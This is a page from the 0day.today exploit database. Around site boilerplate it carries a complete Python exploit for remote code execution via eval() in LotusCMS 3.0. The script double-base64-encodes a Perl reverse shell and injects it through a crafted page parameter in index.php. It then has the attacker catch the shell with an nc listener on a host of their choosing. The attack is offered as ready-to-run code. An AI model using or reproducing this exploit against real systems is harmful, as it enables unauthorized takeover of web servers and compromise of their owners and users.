0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LotusCMS 3.0 PHP Code Execution
#!/usr/bin/python # Script that spawns a reverse shell (python) # on vulnerable LotusCMS 3.0 installations. # Uses a simple PHP eval() vulnerability. # http://secunia.com/secunia_research/2011-21/ # infodox - Insecurety Research (2013) # insecurety.net - @info_dox import requests import random import threading import sys # Add in the payload generating functions here, add Perl later... # Add in the payload generating functions here def genpayload(host, port): """ Perl Reverse Shell Generator """ load = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';""" %(host, port) encoded = load.encode('base64') encoded = encoded.strip() encoded = encoded.replace('\n', '') encoded = encoded.encode('base64') encoded = encoded.strip() encoded = encoded.replace('\n', '') # double encoding , yes payload = "system(base64_decode(base64_decode('%s')))" %(encoded) return payload def hack(pwn): requests.get(pwn) def main(): haxurl = "http://" + target + path + "index.php?page=index%27%29%3B%24{INSERTCODE}%3B%23" payload = genpayload(host, port) pwn = haxurl.replace("INSERTCODE", payload) print "[+] Preparing for hax" print "[!] Please run nc -lvp %s on your listener" %(port) raw_input("Press Enter to Fire...") # debugging print "[*] Sending malicious request..." threading.Thread(target=hack, args=(pwn,)).start() # ph33r l33t thr34d1ng print "[?] g0tr00t?" sys.exit(0) def randomQuote(): quotes =\ ['Now with advice from Sabu!', 'Now with LOIC Support', 'Now with auto-DDoS', 'Now with auto-brag!', 'Now with advice from Kevin Mitnick', 'Now with added dongles!', 'Comes with free forkbombs!', 'Now with a free copy of Havij', 'Are you stoned, or just stupid?'] randomQuote = random.choice(quotes) return randomQuote def banner(): print "LotusCMS 3.0 Eval() Remote Code Execution Exploit." randomquote = randomQuote() print randomquote if len(sys.argv) != 5: banner() print "Usage: %s <target host> <path to lcms> <listener host> <listener port>" %(sys.argv[0]) print "Example: %s hackme.com /lcms/ hacke.rs 1337" %(sys.argv[0]) sys.exit(1) else: banner() target = sys.argv[1] path = sys.argv[2] host = sys.argv[3] port = sys.argv[4] main() # 0day.today [2024-11-14] #